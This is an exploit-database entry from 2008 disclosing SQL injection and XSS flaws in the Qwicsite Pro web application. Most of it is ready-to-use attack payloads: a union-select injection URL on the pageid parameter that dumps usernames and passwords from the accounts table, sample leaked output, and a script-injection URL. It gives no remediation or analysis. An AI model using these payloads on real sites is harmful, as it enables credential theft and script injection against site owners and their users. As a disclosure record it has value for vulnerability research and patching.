[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Qwicsite Pro (SQL/XSS) Multiple Remote Vulnerabilities
# Published : 2008-09-04
# Author : Cr@zy_King
# Previous Title : ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability
# Next Title : ACG-ScriptShop (cid) Remote SQL Injection Vulnerability
By Cr@zy_King a.k.a t4cs1zkr4L
Qwicsite Pro (SQL/XSS) Multiple Vulnerabilities
http://localhost/?pageid=-1+union+select+1,2,3,concat(0x3a3a,username,0x3a3a,password)+from+accounts/*
<!-- checkpageuser - -1 union select 1,2,3,concat(0x3a3a,username,0x3a3a,password) from
accounts/* - - ::al3m::kinq -->
::Username::pass
http://localhost/?pageid=<script>alert("Cr@")</script>
www.biyosecurity.com - www.heykirmedya.net [Yakinda Online]
# www.Syue.com [2008-09-04]